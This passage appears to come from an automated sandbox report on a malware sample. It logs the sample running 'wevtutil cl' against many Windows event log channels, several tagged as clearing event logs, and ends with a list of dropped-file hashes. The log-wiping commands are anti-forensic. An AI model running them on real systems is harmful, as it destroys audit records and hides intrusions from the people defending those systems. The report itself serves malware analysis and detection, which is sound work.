C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Restricted"3⤵PID:488
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Analytic"3⤵PID:2972
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Operational"3⤵
- Clears Windows event logs
PID:1660 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"3⤵PID:1576
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"3⤵PID:2868
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"3⤵
- Clears Windows event logs
PID:1476 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"3⤵PID:3340
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Compatibility-Infrastructure-Debug"3⤵PID:880
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"3⤵
- Clears Windows event logs
PID:3388 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Analytic"3⤵
- Clears Windows event logs
PID:4544 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Trace"3⤵PID:2984
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"3⤵PID:3676
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"3⤵PID:812
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"3⤵PID:4380
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Application-Experience/Steps-Recorder"3⤵PID:4656
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppxPackaging/Debug"3⤵PID:2724
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppxPackaging/Operational"3⤵PID:3760
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppxPackaging/Performance"3⤵
- Clears Windows event logs
PID:4264 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AssignedAccess/Admin"3⤵PID:4576
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AssignedAccess/Operational"3⤵
- Clears Windows event logs
PID:2024 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Admin"3⤵PID:1276
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Operational"3⤵PID:1768
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AsynchronousCausality/Causality"3⤵PID:4556
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"3⤵PID:344
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/GlitchDetection"3⤵PID:4228
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/Informational"3⤵
- Clears Windows event logs
PID:3100 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/Operational"3⤵PID:2104
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/Performance"3⤵PID:960
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audio/PlaybackManager"3⤵PID:2356
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Audit/Analytic"3⤵PID:2112
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"3⤵PID:4572
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Authentication/AuthenticationPolicyFailures-DomainController"3⤵PID:272
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUser-Client"3⤵
- Clears Windows event logs
PID:5012 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserFailures-DomainController"3⤵
- Clears Windows event logs
PID:264 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserSuccesses-DomainController"3⤵
- Clears Windows event logs
PID:4152 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"3⤵PID:4260
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BTH-BTHPORT/HCI"3⤵PID:3296
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BTH-BTHPORT/L2CAP"3⤵PID:3140
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BTH-BTHUSB/Diagnostic"3⤵PID:4992
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BTH-BTHUSB/Performance"3⤵
- Clears Windows event logs
PID:4888 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic"3⤵PID:1140
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Operational"3⤵PID:4504
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BackgroundTransfer-ContentPrefetcher/Operational"3⤵PID:4328
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Backup"3⤵PID:4160
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Connections/Operational"3⤵
- Clears Windows event logs
PID:4840 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Resource-Flows/Operational"3⤵PID:2344
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Battery/Diagnostic"3⤵PID:4040
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Biometrics/Analytic"3⤵PID:1724
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"3⤵PID:1504
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"3⤵PID:2624
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"3⤵PID:932
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BitLocker-Driver-Performance/Operational"3⤵PID:3500
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Management"3⤵PID:2496
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Operational"3⤵PID:3468
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BitLocker/Tracing"3⤵PID:3424
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"3⤵PID:2684
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"3⤵PID:3784
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Bluetooth-BthLEPrepairing/Operational"3⤵
- Clears Windows event logs
PID:1700 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Bluetooth-Bthmini/Operational"3⤵PID:1128
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"3⤵PID:1932
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Bluetooth-Policy/Operational"3⤵PID:3648
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"3⤵PID:440
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"3⤵PID:2616
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"3⤵PID:3700
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheMonitoring/Analytic"3⤵
- Clears Windows event logs
PID:1104 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"3⤵PID:1012
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"3⤵
- Clears Windows event logs
PID:3448 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CAPI2/Catalog Database Debug"3⤵PID:4056
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"3⤵
- Clears Windows event logs
PID:5048 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CDROM/Operational"3⤵PID:4128
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COM/Analytic"3⤵PID:2396
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COM/ApartmentInitialize"3⤵
- Clears Windows event logs
PID:536 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COM/ApartmentUninitialize"3⤵PID:4480
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COM/Call"3⤵PID:4720
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COM/CreateInstance"3⤵PID:4520
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COM/ExtensionCatalog"3⤵PID:4828
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COM/FreeUnusedLibrary"3⤵PID:4724
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COM/RundownInstrumentation"3⤵
- Clears Windows event logs
PID:1084 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COMRuntime/Activations"3⤵
- Clears Windows event logs
PID:3396 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COMRuntime/MessageProcessing"3⤵PID:4744
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"3⤵PID:916
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"3⤵PID:3960
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"3⤵PID:1056
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational"3⤵
- Clears Windows event logs
PID:4032 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-User/Operational"3⤵PID:4564
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Cleanmgr/Diagnostic"3⤵PID:2028
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"3⤵PID:2256
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CloudStore/Debug"3⤵
- Clears Windows event logs
PID:4348 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CloudStore/Operational"3⤵PID:4092
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"3⤵PID:5076
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"3⤵PID:4796
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"3⤵PID:3480
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"3⤵PID:5032
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"3⤵PID:4884
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Analytic"3⤵
- Clears Windows event logs
PID:4220 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Operational"3⤵PID:4812
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Containers-BindFlt/Debug"3⤵
- Clears Windows event logs
PID:4880 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Containers-BindFlt/Operational"3⤵PID:4760
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Debug"3⤵
- Clears Windows event logs
PID:4932 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Operational"3⤵PID:2448
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Debug"3⤵PID:628
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Operational"3⤵PID:1452
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CoreApplication/Diagnostic"3⤵PID:4976
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CoreApplication/Operational"3⤵PID:4016
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CoreApplication/Tracing"3⤵PID:3112
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Debug"3⤵
- Clears Windows event logs
PID:3592 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Operational"3⤵PID:4280
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CoreWindow/Analytic"3⤵
- Clears Windows event logs
PID:1020 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CoreWindow/Debug"3⤵PID:3884
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"3⤵PID:1332
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"3⤵PID:2716
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crashdump/Operational"3⤵PID:4204
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"3⤵PID:3044
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-BCRYPT/Analytic"3⤵PID:2816
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-CNG/Analytic"3⤵PID:4876
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/BackUpKeySvc"3⤵
- Clears Windows event logs
PID:1676 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Debug"3⤵
- Clears Windows event logs
PID:60 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Operational"3⤵
- Clears Windows event logs
PID:688 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-DSSEnh/Analytic"3⤵PID:4020
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-NCrypt/Operational"3⤵PID:2136
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"3⤵PID:2024
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Crypto-RSAEnh/Analytic"3⤵PID:1276
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"3⤵PID:1768
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"3⤵PID:4556
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DAL-Provider/Analytic"3⤵PID:3132
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DAL-Provider/Operational"3⤵PID:4476
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DAMM/Diagnostic"3⤵PID:3088
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"3⤵
- Clears Windows event logs
PID:912 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DDisplay/Analytic"3⤵PID:1156
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DDisplay/Logging"3⤵PID:4300
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DLNA-Namespace/Analytic"3⤵PID:4332
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"3⤵PID:4628
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DSC/Admin"3⤵PID:280
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DSC/Analytic"3⤵PID:260
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DSC/Debug"3⤵PID:4400
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DSC/Operational"3⤵PID:288
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"3⤵PID:3324
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"3⤵PID:4772
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"3⤵
- Clears Windows event logs
PID:2996 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DXGI/Logging"3⤵
- Clears Windows event logs
PID:4776 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DXP/Analytic"3⤵
- Clears Windows event logs
PID:3004 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Data-Pdf/Debug"3⤵PID:8
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/Admin"3⤵PID:1140
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/CrashRecovery"3⤵
- Clears Windows event logs
PID:4504 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"3⤵PID:4328
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"3⤵
- Clears Windows event logs
PID:4160 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"3⤵PID:4840
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Deduplication/Diagnostic"3⤵PID:2344
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Deduplication/Operational"3⤵
- Clears Windows event logs
PID:4040 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Deduplication/Performance"3⤵PID:1724
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Deduplication/Scrubbing"3⤵
- Clears Windows event logs
PID:1060 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Defrag-Core/Debug"3⤵
- Clears Windows event logs
PID:788 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"3⤵PID:4732
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DesktopActivityModerator/Diagnostic"3⤵PID:2548
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DesktopWindowManager-Diag/Diagnostic"3⤵PID:3364
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceAssociationService/Performance"3⤵PID:3508
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceConfidence/Analytic"3⤵
- Clears Windows event logs
PID:3560 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceGuard/Operational"3⤵PID:820
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceGuard/Verbose"3⤵
- Clears Windows event logs
PID:64 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Admin"3⤵PID:3356
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3724
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8B
MD5933d7ec82a73aca5dd0a05619e82e874
SHA1f55dbc352e1dc285e514469d841f9eb371afb341
SHA256cebf5d9b225cd17e012ea3a0e995fd1e6ef65edf18b7335769be7aee8e412c07
SHA5122c8f76492a1c7caea0efa80614b89baff55748ea00c8191e646fdbe38acd3bed8dca69529c8ea3252930b414f56d99ff8df6223d8e128b22d69d2e12c75da3c0
-
Filesize
1KB
MD523cb6bce418d720b600fb36625cea4df
SHA18f4018131e41187445688df8cbda01119efff157
SHA2564ef805e48ac50fda04eeffff3a725481151dd1dccaf462c02105aa27f630e136
SHA51218bd24abd2d55a288933d8b1ce363e5a92703c1c25758ce3d6e52a3b3a25b00d70194fa73520f819afa0080c09866235a22c5c5785ecea2ecd1b5feca36a66b5
-
Filesize
2KB
MD5c15b6fa7298d73deeb3fb9fb3eba83c4
SHA1be9c8af07d3e78226cc893d15058116331d27ed1
SHA2563c509a1592e7683d300d8eef7d7b941dcb22e035cc6f0d25835ce3c6edd23302
SHA5128034be57b18aae34c3c784281f26e83a7645f07ee5ac3972ac750951a2fb0c81ba212cbfef9de6cc81b5bd905db139f168f16c09815db18e50fa24dcf0d818e2
-
Filesize
2KB
MD5c15b6fa7298d73deeb3fb9fb3eba83c4
SHA1be9c8af07d3e78226cc893d15058116331d27ed1
SHA2563c509a1592e7683d300d8eef7d7b941dcb22e035cc6f0d25835ce3c6edd23302
SHA5128034be57b18aae34c3c784281f26e83a7645f07ee5ac3972ac750951a2fb0c81ba212cbfef9de6cc81b5bd905db139f168f16c09815db18e50fa24dcf0d818e2
-
Filesize
292B
MD5d80cc59347ae4e43809417a7120d75f5
SHA185934dbe2cec5c1d576a5e38b5e395534926dc9e
SHA2567f1ee54ab577e083727b2be4efd3f76cd2f7b4e0d02489d90003b1bc2eb7eeb9
SHA512ee73dec24aa6828f0af9020697468c031c08242a9b84252056e19c0463fe484a53413bafe9bda25085092eeca36871dee74b0bf063a900ff6b4ace89143c1ae4
-
Filesize
292B
MD5d80cc59347ae4e43809417a7120d75f5
SHA185934dbe2cec5c1d576a5e38b5e395534926dc9e
SHA2567f1ee54ab577e083727b2be4efd3f76cd2f7b4e0d02489d90003b1bc2eb7eeb9
SHA512ee73dec24aa6828f0af9020697468c031c08242a9b84252056e19c0463fe484a53413bafe9bda25085092eeca36871dee74b0bf063a900ff6b4ace89143c1ae4
-
Filesize
885KB
MD5a57e1e6fe1c98d2e75799a46e9eb5797
SHA17878e7042c355546c118a38b90d8f7221f74d8a4
SHA2568c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe
SHA5125764f3b1971f64c9d55f387524d92038350dbdf9a7195dc7e3f7b83760d93f45e73dd4c4af6cc597add838acd2d4a4e5b7a96a3444e3c8b0369b1d487621909d
-
Filesize
8B
MD5933d7ec82a73aca5dd0a05619e82e874
SHA1f55dbc352e1dc285e514469d841f9eb371afb341
SHA256cebf5d9b225cd17e012ea3a0e995fd1e6ef65edf18b7335769be7aee8e412c07
SHA5122c8f76492a1c7caea0efa80614b89baff55748ea00c8191e646fdbe38acd3bed8dca69529c8ea3252930b414f56d99ff8df6223d8e128b22d69d2e12c75da3c0
-
Filesize
2KB
MD5c15b6fa7298d73deeb3fb9fb3eba83c4
SHA1be9c8af07d3e78226cc893d15058116331d27ed1
SHA2563c509a1592e7683d300d8eef7d7b941dcb22e035cc6f0d25835ce3c6edd23302
SHA5128034be57b18aae34c3c784281f26e83a7645f07ee5ac3972ac750951a2fb0c81ba212cbfef9de6cc81b5bd905db139f168f16c09815db18e50fa24dcf0d818e2
-
Filesize
292B
MD5d80cc59347ae4e43809417a7120d75f5
SHA185934dbe2cec5c1d576a5e38b5e395534926dc9e
SHA2567f1ee54ab577e083727b2be4efd3f76cd2f7b4e0d02489d90003b1bc2eb7eeb9
SHA512ee73dec24aa6828f0af9020697468c031c08242a9b84252056e19c0463fe484a53413bafe9bda25085092eeca36871dee74b0bf063a900ff6b4ace89143c1ae4
-
Filesize
885KB
MD5a57e1e6fe1c98d2e75799a46e9eb5797
SHA17878e7042c355546c118a38b90d8f7221f74d8a4
SHA2568c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe
SHA5125764f3b1971f64c9d55f387524d92038350dbdf9a7195dc7e3f7b83760d93f45e73dd4c4af6cc597add838acd2d4a4e5b7a96a3444e3c8b0369b1d487621909d